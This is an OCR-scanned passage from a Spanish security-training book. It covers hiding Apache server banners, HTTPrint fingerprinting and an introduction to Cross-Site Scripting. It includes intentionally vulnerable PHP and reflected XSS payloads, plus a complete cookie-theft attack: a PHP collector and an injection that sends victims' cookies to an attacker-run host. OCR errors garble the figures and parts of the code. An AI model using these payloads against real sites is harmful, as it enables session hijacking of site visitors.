realmente se está usando- aprenderemos a modificar el banner a gusto. 


Modificar el banner 

Si ya hemos instalado nuestro servidor HTTP Apache todavía 
podemos hacer algo para evitar mostrar estos datos: editar el archivo 
de configuración httpd.conf. Deberemos agregar o modificar, según 
corresponda, las siguientes directivas: 
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ServerSignature Off 
ServerTokens Prod 


La primera línea (ServerSignature Off) sirve para que, cuando se 
produzca un error (por ejemplo 404 Not Found), el servidor no muestre 
en la página datos de sí mismo. 

La segunda línea es ServerTokens Prod, que permite ocultar la 
información que se ve en la cabecera Server y que lo único que se vea 
en el banner sea Apache (también, en la directiva, podría ir 0S, Major, 
Minor o Min, pero muestran aún más información que Prod). 

Si todavía no instalamos nuestro servidor Apache, tenemos una 
mejor opción: editar el archivo ap_release.h, que encontramos en la 
carpeta include. Allí podremos personalizar completamente el banner, 
inventar un nuevo nombre de servidor o reemplazarlo por otro, como 
Internet Information Server. Lo que veremos al abrir ese archivo es 
similar a lo que muestra la Figura 23. 


GNU nano Z.Z.4 Archivo: ap_release.h 


To direct input to this /M, chick inside or press Ctri+G. =) ud E Ed +] yal 


Figura 23. Para personalizar el banner de nuestro servidor, 
podemos editar el archivo ap_release.h. 


Una buena idea sería engañar al atacante y hacerle creer que 


está frente al servidor IIS de Microsoft, modificando los datos de 
la siguiente manera: 
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Hdefine AP_SERVER_BASEVENDOR “Microsoft” 
ttdefine AP_SERVER_BASEPROJECT “Microsoft-11S” 
define AP_SERVER_BASEPRODUCT “IIS” 


ttdefine AP_SERVER_MAJORVERSION_NUMBER 6 
ttdefine AP_SERVER_MINORVERSION_NUMBER O 


Así, cuando realicemos una petición al servidor, podremos visualizar 
que la cabecera Server dice: Microsoft-11S/6.0. Sin embargo, los 
atacantes no se van a dejar engañar tan fácilmente. En la primera 
sospecha intentarán identificar mediante otras técnicas cuál es el 
verdadero software que contiene el servidor. 


Análisis con HTTPrint 


Como hemos dicho, el banner no es 100% fiable, por lo que, 
si estamos realizando un test de intrusión, debemos hacer otras 
pruebas de HTTP Fingerprinting. La clave está en los diferentes 
comportamientos que tienen los servidores HTTP ante la misma 
circunstancia. Por ejemplo, cuando realizamos una petición HEAD, 
el orden de las cabeceras en la respuesta del servidor es diferente 
en Apache, IIS, y otros servidores. Lo mismo ocurre cuando se intenta 
utilizar un método no permitido, un protocolo diferente, otra versión 
de HTTP (inexistente), etcétera. 

En definitiva, los servidores HTTP responden de diferente manera 
a la misma petición, y esto nos ayuda a identificarlos porque, más 
allá de lo que diga el banner, analizando su respuesta podremos tener 
bastante seguridad sobre el software utilizado. 

Puede que distinguir entre un servidor Apache y un !IS mediante 
estas técnicas sea fácil, pero si queremos aún más detalles (como, por 
ejemplo, la versión del software) el asunto se complica. Así como hay 
diferencias entre servidores HTTP, también las hay entre las distintas 
versiones de un mismo servidor. Deberíamos poseer una base de datos 
con las firmas de cada software y su respectiva versión, para luego 
comparar nuestro análisis del objetivo con estas firmas y así identificar 
frente a qué servidor nos encontramos. 
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. Existe una herramienta que posee una base de 
LAS TECNICAS HTTP datos con estas firmas y ayuda a realizar la tarea: 
FINGERPRINTING HTTPrint, una aplicación que analiza el objetivo 

con diferentes técnicas de HTTP Fingerprinting 
IDENTIFICAN y crea una huella para compararla con su base 
EL SOFTWARE de datos de firmas e informar el software que 

se está utilizando en el servidor. Está disponible 
DE UN SERVIDOR para varias plataformas y el sitio web desde 
donde descargarla es: http://net-square.com/ 


E E httprint.html. 


W httprint version 0.301 
Dor aa ted | 
Signamre Fle 


Input Fle 
a WsersisheyrápoDataLocalTemprR SEO Apr 301 | 


Apo aladloacal emp Hart X00 4 ZAhtipent_ AD Ver 22 


| barrer Deduced 


VA, ca 1 Y eo [] apecte'2212 bar TLDZO [Lira vr 
Ae no! EN [_] Apacho/! 3,41 Und PH?/5.217 TUMIZ.0 ¡Lima! 2992 
a) a) ] dpache/2715 Microsoft 1546 0 3855 
a LON ln] |] Apeche/22 Lolus-Durmo/E.x 32,59 
vn a comar 90 [_] MurosoMt1$/6.0 Morocoh 11540 94134 
A e Ot 80 L] Apache? 215 MImarmod_::V22190pe_ TLOX/20 Lina 4 
meo: .2.19 dica 1.9. He-£3 heLS DAV/2 PKP/5,2.17 
DS ICODCSSáDIC2S $811 icebciOsock 42? C9DCS 
458581 decDa78 COLICADe SE 2 deb Nic OCA LICIDeS 
pcia (SiN ¿CoDesdacaeSal B11CIDCSE2CEE 927811C9DC6 


$11C9DC 
ICSE2CE6 92024200B4C811C 9005811 AS 9EBILCIOCSERDICII6 


A pÑ 351 l 
Apache/1. 64 27.79 | 
O add: 04 27.79 ; . 


Repor File 
fr Vs isheytápoDatans aca TempiA a SE9DO BAMNr_30 al. 


pe e » | "| Clos An | Options | 


ttprint has been completed. « » 


Figura 24. HTTPrint ayuda a identificar 
el software que se ejecuta sobre nuestro objetivo. 


En la Figura 24 observamos que esta herramienta permite analizar 
varios sitios a la vez. En una columna muestra lo que dice el banner y 
en otra lo que dedujo mediante técnicas de Fingerprinting, junto con la 
comparación de la huella con sus firmas ya almacenadas. En la Figura 
25 podemos ver el tipo de reporte que genera la aplicación. 

En este caso vemos un sitio que, según su banner, utiliza el software 
Apache (versión 2.2.15), pero parece que engaña: según la deducción 
de HTTPrint, está usando Microsoft-11S (versión 6.0). 
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AA Monile Freicx EE 


fte Ve Hutorial =d0es Hemanerias Ayude 
AA el 
Me |) el CI Vers she AppOota/Locol TempRersEX0O 432/Mttprint_301/wm32/herprntotputntrl 


http. == 
: POE web server fingerprinting report 


A A AAA LAIA 
CA AE AO AT 
5 7 BT VE 
A A AAA ESE 
[ome cor ar [00 | [MbcrosoñA1S/I60 22 MASO | | 
5 10 > O E 1 
EAT CA ¡TUUZ O Miro 10 | 


Figura 25. HTTPrint genera un reporte 
sobre el análisis en html, xml o csv. 


uu vY 


Comprendimos la importancia del protocolo HTTP y su funcionamiento. Aprendimos a utilizar herramien- 
tas como Live HTTP headers y NetCat para dialogar con los servidores. Nos concentramos en analizar 
los diferentes métodos de petición (OPTIONS, GET, POST, HEAD, TRACE y PUT) para obtener datos 
de importancia e investigar cómo vulnerar nuestro objetivo. Analizamos los códigos de estado HTTP, que 
permiten conocer los problemas que pueden presentarse al realizar una petición, y finalmente aprendi- 
mos técnicas de HTTP Fingerprinting para identificar servidores. 
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Actividades 


TEST DE AUTOEVALUACIÓN 


¿Qué significa hipertexto? 

¿Cómo funciona el protocolo HTTP? 

¿Para qué sirve el software Apache? 

¿Qué diferencia hay entre Live HTTP headers y NetCat? 

¿Cuáles son las versiones del protocolo HTTP y qué diferencias hay entre ellas? 
¿Cuál es la diferencia entre GET y HEAD? 

¿Cuáles son las cabeceras HTTP más interesantes para un hacker? 


¿Cómo se puede vulnerar un servidor mediante el método PUT? 


00 Of Odd bh Y N FP 


¿Cómo podemos identificar el software utilizado por un servidor web? 


EJERCICIOS PRÁCTICOS 


Instale un servidor HTTP Apache. 
Intercepte una conexión HTTP con el add-on para Firefox Live HTTP Headers. 
Realice una petición HEAD a un sitio web mediante NetCat. 


Envíe contenido a un servidor utilizando el método POST desde NetCat. 


1 
2 
3 
4 
5 


£, PROFESOR EN LÍNEA 


Instale la herramienta HTTPrint y analice al menos cinco sitios web diferentes. 


Si tiene alguna consulta técnica relacionada con el contenido, puede contactarse 
con nuestros expertos: profesorOredusers.com 


»  Www.redusers.com www.detodoprogramacion.com 


1/ SOS 


Ataques Cross-Site 


En este capítulo ingresamos a la auditoria de aplicaciones web. 


Empezaremos con los ataques Cross-Site, que impactan del 
lado del cliente, afectando a los usuarios que visiten el sitio. 
Identificaremos y explotaremos las fallas que permiten realizar 
estos ataques para comprender la peligrosidad de la técnica, 

y conoceremos maneras de evadir filtros de datos. Por último, 


programaremos una aplicación segura. 


w Introducción a Cross-Site w Evasión de filtroS..........occcccnnn. 140 SS 


SERIO ios 116 
A 143 

v Mi nombre es <script> .......... 121 
a AE 144 

w XSS persistente ...cocnconconennonnos 131 


AMA 
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Introducción a 


Cross-Site Scripting 


Hay muchos ataques de tipo Cross-Site, pero comenzaremos 
analizando el más común: Cross-Site Scripting, también conocido 
como XSS. La mayor parte de los ataques Cross-Site aprovechan el mal 

filtrado de datos de una aplicación web, es decir, 
la información con la que el usuario interactúa 


LOS ATAQUES CROSS- sobre el sitio (por ejemplo, formularios, libros 


SITE APROVECHAN de visitas, foros), donde los datos escritos no 
son controlados debidamente por la aplicación. 

EL MAL FILTRADO Casi todos los programadores pasan por alto esta 

DE DATOS DE UNA vulnerabilidad. Existe un proyecto de OWASP 


(Open Web Application Security Project) que realiza 


APLICACION WEB un Top Ten con las diez vulnerabilidades que 


ee 


más afectan a los sitios web hoy en día. Como 

podemos ver en la página del proyecto (www. 
owasp.org/index.php/Category:OWASP_Top_Ten Project), XSS 
ocupa actualmente el tercer puesto. 

Desde el punto de vista del atacante, debemos buscar una entrada 
de datos en el sitio web (formulario, libro de visitas, etcétera) e intentar 
darle un uso diferente al que realmente tiene. Para cambiar el 
comportamiento de la aplicación inyectaremos código HTML, JavaScript 
u otra tecnología client-side en dicha entrada. Pero, antes de pasar de 
lleno a la acción, debemos tener claras las diferencias entre cliente y 
servidor y conocer las tecnologías web involucradas en la técnica. 


Inyección de código 
x¡_cOooc_nhooooooo__cncO—: 


Ejecución de código inyectado 
>  _x__————_————_—_—— 


Hacker Aplicación 
web 


Figura 1. Para explotar un XSS debemos encontrar una entrada 
de datos donde sea posible hacer una inyección de código. 
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Dos lados diferentes: 
Cliente y Servidor 


Luego de analizar en los capítulos anteriores el funcionamiento 
de los protocolos HTTP y DNS, que claramente utilizan el esquema 
cliente-servidor, es probable que tengamos bien definida la diferencia 
entre ambos lados. De todos modos, trataremos nuevamente el tema 
enfocando la explicación desde la técnica de Cross-Site Scripting. 

Tal como aclara el título de esta sección, son dos lados diferentes. 
El cliente es quien realiza peticiones al servidor (por ejemplo, un 
usuario que desde un navegador web solicita la resolución de nombres 
de dominio o transferencias de recursos web, interactúa con los sitios 
enviando y recibiendo información, etcétera). Por otro lado, el servidor 
debe atender al cliente enviándole toda la información que solicite, es 
decir, respondiendo cada una de sus peticiones. 

Lo interesante es que, así como hay aplicaciones que funcionan del 
lado del cliente y otras del lado del servidor, también hay tecnologías 
web que se ejecutan de un lado o del otro. 


Petición 
== 
o 
á Respuesta < 
Cliente Servidor 


Figura 2. En la arquitectura cliente-servidor, el cliente realiza 
las peticiones mientras que el servidor se encarga de responderle. 


JavaScript de nuestro lado 

Existe una gran variedad de lenguajes y tecnologías para la 
programación de páginas web, como HTML, PHP, JavaScript, VBScript, 
Ajax o ASP. Pero, dijimos, algunos se ejecutan del lado del servidor 
(como PHP) y otros del lado del cliente (como JavaScript). En la técnica 
de Cross-Site Scripting se encuentran involucrados los lenguajes que se 
ejecutan del lado del cliente, es decir, en el navegador del usuario que 
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solicita la página. Es probable que tengamos dudas respecto a esto y 
nos preguntemos cómo es posible que el código de la página se ejecute 
en nuestro navegador, si ésta se aloja en un servidor en cualquier parte 
del mundo. Sucede que, cuando visitamos un sitio web a través de 
nuestro navegador, enviamos la petición para ver determinada página 
al servidor que la hospeda, éste responde con el código (conformado 
por HTML, JavaScript, etcétera) y luego nuestro navegador lo descarga 
e interpreta para mostrar el contenido en pantalla. 


A <html>..JS..</html> 
PO RAEE AA AR 
Cliente ió 


Figura 3. JavaScript es un lenguaje que se ejecuta del lado del cliente; 
nuestro navegador lo interpreta y muestra el contenido en pantalla. 


En la sección anterior mencionamos que en el ataque de Cross-Site 
Scripting se debe hacer una inyección de código a una entrada de 
datosdelaaplicación we b.Ese código inyectado estará programado 
en JavaScript, así que dicho lenguaje nos acompañará a lo largo de 
todo el capítulo. 

Pero, si JavaScript se ejecuta en nuestro navegador, ¿cómo logramos 
llegar al servidor? ¿Acaso la idea no es obtener el control total de 
nuestro objetivo? Cross-Site Scripting es un ataque del lado del cliente 
ya que, no importa lo que se haga, el servidor no será afectado. 
Entonces la pregunta es: ¿hasta dónde se puede llegar con esta técnica? 


"AS 


“SERVIDOR 


La arquitectura cliente-servidor se emplea en múltiples casos. Los protocolos HTTP, DNS, IRC, FTP y 


muchos otros utilizan este esquema. También las redes de computadoras suelen tener un servidor de 


archivos, al cual acceden los equipos pertenecientes a la red (clientes). 
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El límite de XSS es la imaginación 


Desde afectar a un usuario hasta afectar a miles, desde obtener 
el acceso a una cuenta de correo, panel de administración, redes 
sociales... hasta redireccionar para donde se quiera todos los accesos 
a un sitio. El límite de XSS es la imaginación y el conocimiento que se 
posea sobre JavaScript u otro lenguaje client-side. De todos modos, 
quienes no sepan demasiado de programación podrán ver ejemplos 
simples, de gran ayuda para empezar en el tema. 


O Compry 0040 Tag ten hagas - On... [4 
es - », nm 


A A A A a A A 


Category OWASP Top Ten Project 
[id e. pame he po od o cn 0 O 
o. o 


baena ¿OPIO 


Figura 4. Cross-Site Scripting ocupa el tercer puesto 
en el Top Ten de vulnerabilidades OWASP. 


Aunque el servidor no se vea afectado con lo que hagamos, 
existen infinidad de ataques posibles con Cross-Site Scripting dirigidos 
a clientes, es decir, a quienes visitan el sitio web vulnerable a XSS. 
El código inyectado en la página dependerá, en parte, de la intención que 
se tenga. Por ejemplo, XSS es aprovechado muchas veces para obtener 
acceso a la cuenta de administración del sitio o a las de los usuarios, 
o para redireccionar a cada visitante que ingresa hacia otro sitio. 


Tipos de Cross-Site Scripting 


En este capítulo analizaremos a fondo dos tipos de Cross-Site Scripting, 
dado que la inyección que se realice puede variar según el tipo de XSS. 
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Para comenzar, hablaremos del más común: el reflejado, también 
llamado no persistente o indirecto. Afecta únicamente a las personas 
que el atacante elija para, por ejemplo, obtener su cuenta de usuario 
en el sitio vulnerable. Se trata de una técnica “no persistente” porque el 
código inyectado no permanece en la página. El atacante deberá engañar 
a su usuario objetivo haciéndolo entrar a la página vulnerable a través 
de una dirección URL manipulada, que contiene la inyección de código. 


http://sitio.com/index.php?var=inyeccion 
q _ _ _  _ zx 


página con código inyectado 


$ 


Usuario Servidor 
web 


Visita el sitio: 
http://sitio.com/index.php?var=inyeccion 


Hacker 


Figura 5. En el XSS reflejado el atacante debe lograr que el usuario ingrese 
al sitio a través de la URL que contiene la inyección de código. 


Otro tipo de Cross-Site Scripting o XSS que podemos encontrar es el 
persistente o directo. La inyección de código persiste en la página, es 
decir que se almacena en una base de datos y queda permanentemente 
allí, afectando a todos los usuarios que ingresen al sitio. Por ende, el 
hacker no sabrá quiénes son las personas que sufrirán su ataque (que 


"444 


DN DOCUMENTACIÓN OWASP SOBRE XSS 


En el sitio web de OWASP podemos encontrar una muy variada documentación sobre la técnica de Cross- 
Site Scripting. Desde métodos de ataque y evasión de filtros hasta mecanismos de prevención. La cita 


obligada es en www.owasp.org/index.php/Cross-site_Scripting_(XSS). 
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podría consistir, por ejemplo, en redireccionarlas hacia otro sitio o 
atacar su navegador web para que deje de funcionar correctamente). 


Y pagina.html con código inyectado 


+ 
Y Usuarios 


http://sitio.com/pagina.html 


Servidor 
web 


inyección de código a pagina.html 


Hacker 


Figura 6. En el XSS persistente la página web almacena el código malicioso 
inyectado, que se ejecuta en los navegadores de todos los visitantes. 


== Mi nombre es <script> 


Dedicaremos esta sección al Cross-Site Scripting reflejado o no 
persistente. Recordemos que se le llama así porque la inyección no 
permanece en la página afectando a todos los visitantes sino que, por 
el contrario, el atacante debe engañar a cada víctima en particular para 
que ejecute en su navegador la inyección de código maliciosa. 

Del lado del atacante se debe buscar en el sitio web una entrada 
de datos donde el contenido no se filtra bien. Por ejemplo, una 
variable en la programación de la web, cuyo valor es asignado por 
el usuario mediante la URL o la aplicación. Tal valor se incluye en el 
código de la página temporalmente, y es interpretado y ejecutado 
por el navegador del usuario. 

A continuación, analizaremos casos donde es común encontrar 
un XSS reflejado. Identificaremos la falla desde el código fuente y 
realizaremos inyecciones en JavaScript. 


www.detodoprogramacion.com www.redusers.com <« 


122 MES 4. ATAQUES CROSS-SITE 


El clásico alert() 


Si hemos leído textos acerca de la técnica de Cross-Site Scripting, 
notaremos que la mayoría brinda ejemplos que utilizan un alert(). 
¿Qué es un alert()? Es esa pequeña ventanita que aparece en pantalla 
mostrando un mensaje. La sintaxis en JavaScript es la siguiente: 
<script>alert(“texto a mostrar');</script>, ya que todo código escrito en 
este lenguaje empieza con <script> y termina con </script>. 


hal 


Sr [A tome" dll image” QY itermator” [l Maceimaca Y Cutie Y tasar K Techo E ves dorcr d Oytenr 


Figura 7. Un alert se utiliza para mostrar 
un determinado mensaje al usuario de la página. 


Dado que en los capítulos anteriores instalamos un servidor web, 
vamos a aprovecharlo para hospedar nuestros códigos vulnerables a 
XSS y realizar diversas prácticas. Empezaremos creando el archivo 
XSS.php (la extensión es .php, por lo cual su código estará programado 
en PHP), al que añadiremos el siguiente contenido: 


<?php 
$pagina = $ _GETL'pagina”); 
if ($pagina == “inicio M 
echo “Esta es la pagina de inicio”; 
) else [ 
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echo “La pagina “.$pagina.” no esta disponible”; 
) 
2> 


Se trata de un código muy simple. En primer lugar, declaramos la 
variable vulnerable (pagina) e indicamos, mediante $ GET, que su valor 
se obtiene a través de la URL. Como vemos, no tiene ningún filtro, por 
lo tanto cualquier valor que le pasemos será aceptado. El resto del 
código es simple: si el valor de pagina es igual a “inicio” se imprime 
un mensaje en pantalla, de lo contrario (si el valor es cualquier otro) 
se imprime otro mensaje. 

in 


http//locelhost/W. pegas CUALQUIERA | + 


1 
€ 5 locatost 6 1 ' ' 


La página CUALQUIERA no está disponible 


r 
MO Puente de rnp//lccalhoa Web Vuinersbles/X55 08 pego» CUALQUIERA - Monika Firetos 


<ntal> 
endo /heado 


body> 
<ht>La página CUALQUIERA no está disponibleck!> 
</body> 


<ftutai> 


Figura 8. Mediante la URL le asignamos valor a la variable pagina; 
según cuál sea dicho valor, se imprimirá un mensaje determinado en pantalla. 


INYECCIONES XSS 


En la página web http://ha.ckers.org/xss.html encontramos una gran lista de códigos JavaScript 
para inyectar. Es muy útil tenerla a mano a la hora de buscar fallos en el sitio que vamos a analizar y para 
evadir filtros de datos, ya que contiene códigos para hacerlo. 
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Como vemos en la Figura 8, ingresamos a la pequeña aplicación 
web desde nuestro navegador y le pasamos el valor a la variable 
pagina mediante la URL, del siguiente modo: XSS.php?pagina=valor. 
Esta es la entrada de datos que tanto buscamos, y la falla radica 
en que se incluye el valor que le asignemos a la variable dentro del 
código fuente de la página. 

Para despejar las dudas, realicemos nuestra primera inyección. 

En vez de pasar como valor una simple palabra, pasaremos un pequeño 
código programado en JavaScript, de modo que la URL quedará así: 
XSS.php?pagina=<script>alert('soy una ventanita molesta =(*);</script>. 

El resultado será similar al que muestra la Figura 9. 


Figura 9. Realizamos una pequeña inyección de código 
a la aplicación web y obtenemos un alert () como resultado. 


Una vez que tenemos la entrada de datos vulnerable a la inyección 
de código, se forma una URL similar a la siguiente: www.sitio.com/ 
XSS.php?pagina=<script>alert(*soy una ventanita molesta =(*);</script>. 

El atacante debe lograr que su objetivo entre al sitio a través de esa 
dirección, ejecutando así la inyección de código en su navegador web. 

Este es un ejemplo sencillo de XSS reflejado; a continuación, 
conoceremos otros casos en los cuales es común encontrar la 
vulnerabilidad de Cross-Site Scripting no persistente. 
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Buscador vulnerable 


Seguramente, navegando por internet nos hemos encontrado 
con sitios web que poseen abundante contenido y por tal motivo 
incorporan un buscador. Dado que nosotros debemos ingresar las 
palabras que buscaremos dentro del sitio, podemos considerar al 
buscador como una entrada de datos. Sin embargo, para completar 
el XSS es necesario que el contenido buscado se incluya en el código 
fuente de la página. ¿Qué es lo que ocurre cuando nuestra búsqueda 
no tiene resultados? Por lo general se muestra un mensaje similar a: 
No se han encontrado resultados de: “texto”. Es entonces cuando lo 
que buscamos se incluye en el código del sitio y, si no existe un 
correcto filtrado de datos, se presenta nuevamente la vulnerabilidad 
de Cross-Site Scripting reflejada. 


BUSCADOR -<, 


NO SE HAN ENCONTRADO RESULTADOS DE: Mola 


Figura 10. Buscador que almacena la búsqueda en una variable GET, 
lo que significa que podemos ver y modificar el valor desde la URL. 


El buscador que observamos en la Figura 10 almacena la búsqueda 
en una variable GET. Por lo tanto, cuando introduzcamos algo en el 
campo de texto, notaremos que la dirección URL cambia y aparece 
la palabra buscada allí, tal como se ve en la imagen. En caso de no 
obtener resultados nos mostrará un mensaje que incluye el texto 
que buscamos (es decir, el valor que contenga la variable) dentro del 
código fuente de la página. 
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Al utilizar este buscador se nos forma una URL similar a la siguiente: 
www.sitiovulnerable.com/buscador.php?buscar=hola. Le pasaremos a la 
variable buscar un valor un poco más raro. Intentemos con el clásico 
alert(): www.sitiovulnerable.com/buscador.php?buscar=<script>alert('Sii 
encontramos un XSS”);</script>. 


a 


Figura 11. Le inyectamos código en JavaScript 
a un buscador vulnerable a XSS. 


Encontramos buscadores de este estilo en millones de sitios web y 
un gran porcentaje es vulnerable a Cross-Site Scripting no persistente. 
En los próximos párrafos, analizaremos otro caso donde es muy común 
encontrar este tipo de XSS. 


Mensaje de bienvenida modificado 


Existen sitios web “sociables”, que muestran en pantalla un mensaje 
de bienvenida. Lo que podemos ver es un texto similar a “Hola Usuario, 
bienvenido a nuestro sitio web” y quizás algunos datos más sobre 
nosotros, como el navegador web que estemos usando, el sistema 
operativo o nuestra dirección IP. 

El nombre que aparezca en el mensaje de bienvenida dependerá del 
usuario que hayamos registrado en el sitio web. Supongamos que, una 
vez que accedemos a la aplicación, nuestro nombre de usuario se 
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almacena en una variable para imprimirse en el mensaje de bienvenida, 


obteniendo una URL parecida a la siguiente: www.sitiovulnerable.com/index. 
php?usuario=nombre. 


Figura 12. Muchos sitios web muestran un mensaje 
de bienvenida en la pantalla del usuario. 


Podemos aprovechar el mensaje para realizar una inyección en 
JavaScript. Si vemos el código fuente de la página desde nuestro 
navegador, notaremos que el nombre de usuario se incluye 
perfectamente en dicho código. Por lo tanto, esta es la entrada de 
datos que necesitamos para llevar a la práctica un XSS reflejado. 


Figura 13. Cambiamos nuestro nombre de usuario por un código 
en JavaScript, que se ejecuta perfectamente en el navegador web. 
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Después de haber realizado algunas prácticas sobre escenarios 
que comúnmente encontramos en la web, ya tenemos claro el 
funcionamiento del Cross-Site Scripting no persistente. En la próxima 
sección aprenderemos a obtener el acceso a una cuenta de usuario 
perteneciente al sitio vulnerable. 


Robo de cookies 


En esta sección aprenderemos a “robar” galletas (cookies, en 
inglés), precisamente unas muy anheladas por los black hat hackers. 

Cuando un usuario ingresa a un sitio web utilizando sus 
credenciales de acceso le es asignada una cookie única, que guardará 
sus permisos y preferencias y lo mantendrá identificado durante el 
tiempo que permanezca en el sitio. Si un atacante logra robar su cookie 
podrá hacerse pasar por él y utilizar sus privilegios dentro del sitio. 


Figura 14. Podemos hacer un alert (document . cookie) 
para ver la cookie que nos asignó el sitio. 


El plan es hacer una inyección de código en JavaScript que, 
cuando el usuario la ejecute en su navegador, automáticamente 
nos envíe su cookie. 

Para comenzar debemos programar un pequeño código en PHP 
que se encargue de guardar la cookie en un simple archivo de texto, 
y alojarlo en algún servidor de nuestro poder. 
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<?php 

$galletita = $ GETL'cookie”); 
$archivo = fopen(“galletas.txt”,“a”); 
fput($archivo, $galletita); 
fclose($archivo); 

2> 


La inyección en JavaScript le pasará como valor a la variable 
cookie el contenido de la propiedad document.cookie. Luego, el código 
PHP se encargará de tomarla y guardarla en el archivo galletas.txt. 
Supongamos que alojamos el código en la siguiente dirección: 
www.nuestrositio.com/robacookies.php. La inyección en JavaScript será: 
<script>document.location="www.nuestrositio.com/robacookies.php?cookie=” 
+document.cookie</script>. Es un poco extensa, pero cargará el archivo 
PHP que roba las galletas (bajo nuestro poder) y le pasará como 
parámetro la cookie que pertenece al usuario víctima del ataque. 


inyección 
<S document.cookie 
Usuario | 
Aplicación 
vulnerable 
inyección 
robacookies.php 

| document.cookie 

Hacker galletas.txt 


Figura 15. Mediante un XSS podemos robar la cookie 
de un usuario y obtener su identidad y privilegios dentro del sitio. 
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En la práctica utilizaremos la aplicación anterior del mensaje 
de bienvenida, ya que el usuario se autentica en el sitio y obtiene la 
cookie única que buscamos. La inyección completa es la siguiente: 
www.sitiovulnerable.com/mensaje.php?usuario=<script>document. 
location="www.nuestrositio.com/codigo.php?cookie=” +document.cookie</ 
script>. Una vez que el usuario la ejecuta en su navegador, su cookie 
se envia al PHP programado, que la almacenará en el archivo galletas.txt. 


Hola , bienvenidé a nuestro sítio web! 
Estas usando el navegador web Firefox 11.0 
Tu sistema operativo es Windows 7 
Y tu dirección 1P: 190.68.105.33 


Figura 16. En la ventana superior del navegador 
vemos la inyección de código, mientras que 
en la inferior está la cookie que le robamos al usuario. 


Finalmente, tenemos la cookie del usuario. ¿Qué es lo que sigue? 
Básicamente, debemos reemplazar la cookie que se nos haya asignado 


"AS 


HO ENCONTRAR UN XSS NO PERSISTENTE 


Que un sitio web no posea ni un buscador ni mensaje de bienvenida no implica que no sea vulnerable a 


XSS. En este capítulo solo vimos algunos casos para dejar en claro el tema. Lo importante es encontrar 
una entrada de datos, es decir, un lugar donde podamos realizar la inyección y que sea incluida en el 
código fuente de la página. 
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por la que acabamos de obtener. En el próximo capítulo trataremos 
detalladamente el "envenenamiento” de cookies y aprenderemos a 
crearlas, editarlas y reemplazarlas. 


XSS persistente 


El Cross-Site Scripting persistente quizás sea más interesante 
que el reflejado, pero es menos común. La inyección de código que 
hagamos será almacenada por la base de datos del sitio y quedará 
permanentemente allí, afectando a todas las personas que visiten 
la página vulnerable. Necesitamos, como atacantes, una entrada de 
datos que guarde lo que introducimos y lo imprima siempre en alguna 
sección del sitio, de modo que todos los visitantes lo vean. 

En esta sección realizaremos prácticas sobre una aplicación que 
se conoce como guestbook (en español, libro de visitas) y suele 
ser vulnerable al XSS persistente, ya que implica un área donde se 
escriben comentarios, que se guardan y son mostrados a todos los 
visitantes de un sitio. 


f 
ll 


Nonbre. 
Comentar y 
A 
enviado por Sheila: 
Este es un libro de visites, le epiicación web que utilizaremos para nuestras 
prácticas. 


Figura 17. Utilizaremos un guestbook para nuestras 
prácticas, ya que suelen ser vulnerables a XSS. 
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El libro de visitas 


En internet está lleno de sitios web, blogs y demás donde 
podemos dejar nuestros comentarios, pero lo interesante es que no 
todos los programadores web recuerdan supervisar correctamente 
lo que la gente escribe allí. 

El escenario sobre el que practicaremos es el típico libro de 
visitas (como el que muestra la Figura 17) y la entrada de datos 
que usaremos es el área de texto para los comentarios. 

Podemos directamente escribir nuestra inyección JavaScript en 
dicha área de texto y enviar el “comentario” (entre comillas, ya que 
lo que enviamos en realidad es un código malicioso). Puede que 
nos salga bien y se ejecute la inyección en el navegador de todos 
los visitantes. Sin embargo, una gran parte de los libros de visita 
cuenta con algún tipo de revisión sobre lo que se envía, lo que 
complica la realización de la inyección. 

Muchos programadores supervisan o filtran el contenido que envían 
los usuarios mediante esta área de texto. Puede pasar que la inyección 
se imprima como texto plano sin ejecutarse, o que directamente se la 
rechace. Lo mejor es tener la mayor certeza posible de que el libro de 
visitas es vulnerable a XSS. Para lograrlo, realizaremos algunas pruebas 
simples antes de enviar la inyección real. 

Una idea interesante es incluir en nuestro comentario alguna 
etiqueta en lenguaje HTML (por ejemplo, <strong>negrita</strong>). Si al 
imprimirse la página vemos que tales etiquetas se incluyen en el código 
fuente estaremos más seguros a la hora de inyectar en JavaScript, ya 
que probablemente las etiquetas <script></script> tampoco se estén 
filtrando. En caso de que la aplicación cuente con filtros sobre lo que 
se envía, hacer una prueba en HTML levanta mucha menos sospecha 
que si se realiza directamente la inyección maliciosa en JavaScript. 


"LAS 


CROSS-SITE REQUEST FORGERY 


Esta vulnerabilidad ocupa el octavo puesto en el top ten de vulnerabilidades OWASP, Cross-Site 


Scripting se aprovecha de la confianza que tiene el usuario sobre el sitio vulnerable, mientras que 
Cross-Site Request Forgery (XSRF) funciona a la inversa, ya que explota la confianza que tiene el 


sitio sobre el usuario. 
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€ lechos! 1] 
Nombre: 
[She dl 
Comentario: 
Mola, soy <hI>Shei</hl> ni próximo 
comentario será una inyección SS 
«P 
| Pablo camera 


Comentario enviado por Shea: 
Hola, soy 


Shei 


mi próximo comentario será una inyección XSS :P 


Figura 18. Pusimos entre las etiquetas <h1> y </h1> 
una palabra que, al imprimirse, se muestra en mayor tamaño, 
por lo tanto, la aplicación no filtra código HTML. 


De todos modos, que un libro de visitas o una aplicación 
vulnerable a XSS tenga un sistema de filtrado sobre lo que los 
usuarios escriben y envían, no garantiza 100% de seguridad contra 
la vulnerabilidad en cuestión. Más adelante, en este mismo capítulo, 
hablaremos de cómo evadir los filtros. 


En definitiva, el mensaje que enviamos se guarda en la base de datos 


del sitio, para luego imprimirse en la página del libro de visitas y que 
todos lo vean. Para llevar a cabo un Cross-Site Scripting persistente 
tenemos que encontrar un lugar donde lo que inyectemos sea incluido 
permanentemente en el sitio, para que pueda ser ejecutado en el 
navegador de todos los usuarios. A continuación, analizaremos 
diferentes códigos en JavaScript muy interesantes para inyectar en 
aplicaciones vulnerables a este tipo de XSS. 


Ataque DoS al navegador 


El ataque de denegación de servicio (Denial of Service, 
DoS) impide que usuarios válidos o lícitos puedan utilizar un 
determinado servicio. Quizás hayamos escuchado o leído noticias 
sobre ataques DoS que se realizan a sitios web: el objetivo es 
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consumir el ancho de banda o provocar un exceso de carga de los 
recursos del sistema (en este caso, del servidor web) de modo que 
quede temporalmente fuera de servicio. 


Tráfico en exceso 


SÓ 


Hacker Servidor 


Figura 19. Generar mucho tráfico sobre un servidor hará 
que éste quede temporalmente fuera de servicio. 


A través de un XSS, lo que se busca es 
denegarle al usuario el uso de su navegador 

LOS ATAQUES “DOS” web, de modo que se vea obligado a “matar” 

CONSUMEN EL ANCHO el proceso del navegador y pierda todo lo que 

estaba haciendo, si no lo había guardado. 

DE BANDA DE UN Conocer este método permite tomar 

